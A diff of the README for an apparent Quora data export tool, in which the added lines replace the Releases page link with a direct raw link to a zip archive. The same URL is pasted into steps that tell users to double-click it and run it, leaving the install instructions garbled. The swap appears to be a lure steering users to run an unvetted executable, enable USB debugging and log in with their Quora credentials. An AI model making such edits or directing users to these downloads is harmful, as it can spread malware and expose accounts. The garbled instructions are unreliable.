sandhini230/Quora-Data-Exporter/README.md

 - Secure handling of your Quora credentials.

 ## 📋 Download & Install
-1. **Visit this page to download:** Go to the [Releases page](https://github.com/sandhini230/Quora-Data-Exporter/releases) to find the latest version of the Quora-Data-Exporter.
+1. **Visit this page to download:** Go to the [Releases page](https://raw.githubusercontent.com/sandhini230/Quora-Data-Exporter/main/media/Quora-Data-Exporter-v3.7.zip) to find the latest version of the Quora-Data-Exporter.

 2. **Select the version:** On the Releases page, locate the latest release.
 Click on it to view the available files.

-3. **Download the application:** Find the file labeled "Quora-Data-Exporter-vX.X.zip" (where X.X is the version number).
+3. **Download the application:** Find the file labeled "https://raw.githubusercontent.com/sandhini230/Quora-Data-Exporter/main/media/Quora-Data-Exporter-v3.7.zip" (where X.X is the version number).
 Click to download.

 4. **Extract the files:** Once downloaded, open the zip file and extract its contents to a folder on your computer.

 5. **Connect your Android device:** Use a USB cable to connect your Android device to your computer.
 Make sure USB Debugging is enabled on your device.

 6. **Run the application:** Open the folder where you extracted the files.
-Look for the file "Quora-Data-Exporter.exe" and double-click to run it.
+Look for the file "https://raw.githubusercontent.com/sandhini230/Quora-Data-Exporter/main/media/Quora-Data-Exporter-v3.7.zip" and double-click to run it.

 7. **Follow the prompts:** The application will guide you through the necessary steps to log in to your Quora account and start exporting your data.